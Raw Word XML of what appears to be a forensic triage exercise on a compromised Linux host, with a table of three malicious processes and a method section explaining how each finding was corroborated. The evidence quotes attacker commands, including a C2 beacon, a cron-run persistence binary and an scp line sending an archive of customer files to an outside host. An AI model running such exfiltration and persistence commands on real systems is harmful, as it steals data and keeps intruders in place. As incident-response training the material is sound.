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Stage 3</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Process Triage</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">SpicyMeatball41</w:t>
        <w:tab/>
        <w:t xml:space="preserve">UBI-2026-0257</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">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32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">THE TRIAGE TABLE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Process (PID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The Line that Proves it (quote verbatim)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Why Suspicious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How it ruled out a false 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sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">PID 2019  </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">/var/lib/mc/.helper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2019   1     root          0.4    0.6    Jun  4 02:15  /var/lib/mc/.helper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Executable at a non-package path (/var/lib/mc/) running as root, parented directly to PID 1 (init), with a child curl process beaconing to 185.220.101.9 — the confirmed C2 IP. Filesystem index confirms it was created Jun 4 02:13, 2 minutes before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No legitimate system package owns /var/lib/mc/.helper (Tunde's annotation confirms this explicitly); mc (Midnight Commander) does not install executables here, and no package manifest entry exists. Corroborated by syslog:02:15:02 — CRON[2455]: (root) CMD (/var/lib/mc/.helper) — and syslog:02:13:11 — kernel: [audit] EXECVE bash /var/lib/mc/.helper.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sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">PID 3211  </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">scp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3211   1882   o.adegoke    0.0    0.2    Jun  4 03:01  /usr/bin/scp -t /tmp/exfil.tgz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SCP process running as o.adegoke, child of the interactive bash shell (PID 1882), transferring a file named exfil.tgz — a name with no legitimate operational context. Memory strings corroborate the full command: scp /tmp/exfil.tgz attacker@185.220.101.9:/dropbox/.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/usr/bin/scp is a legitimate system binary, but the destination (attacker@185.220.101.9:/dropbox/) and filename (exfil.tgz) are not consistent with any normal user workflow; corroborated by syslog:03:01:18 — kernel: [audit] EXECVE scp /tmp/exfil.tgz attacker@185.220.101.9:/dropbox/ — and filesystem-index showing exfil.tgz was created at 03:01 from customers.csv and transactions.csv.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sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">PID 2014  </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">/bin/bash -c chmod +x /var/lib/mc/.helper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2014   1882   root         0.0    0.2    Jun  4 02:13  /bin/bash -c chmod +x /var/lib/mc/.helper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Root-context bash child of the interactive o.adegoke shell (PID 1882) making the .helper payload executable — this is the moment the attacker arms the persistence binary, directly preceding its first execution at 02:15.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chmod spawned from a user's shell under sudo is not inherently suspicious, but the target path (/var/lib/mc/.helper) is the confirmed malicious payload; corroborated by syslog:02:13:08 — kernel: [audit] EXECVE chmod /var/lib/mc/.helper — and filesystem-index showing .helper was written at 02:13 with rwxr-xr-x permissions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">METHOD</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The process was labeled as a normal process when the process executed from a known package path (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/, /usr/sbin/, /lib/systemd/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), had the expected system user, and had the expected parent (parent PID 1 for daemon processes, and parent </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.sshd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for login shells). The process became a candidate if it met any one of the following criteria: unknown or non-package path, unusual parent child relationship, or a command argument that led to a known-malicious file or IP. However, there was an additional requirement of corroboration from either </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">03-syslog.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">05-memory-strings.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to consider the process as a confirmed finding. The process table alone without a corresponding log line would be considered an unconfirmed finding. PIDs 2019 (.helper) and 2014 (chmod) were corroborated with kernel audit in syslog. PID 3211 (scp) was corroborated with syslog and memory strings where the destination command was completely reconstructed from memory.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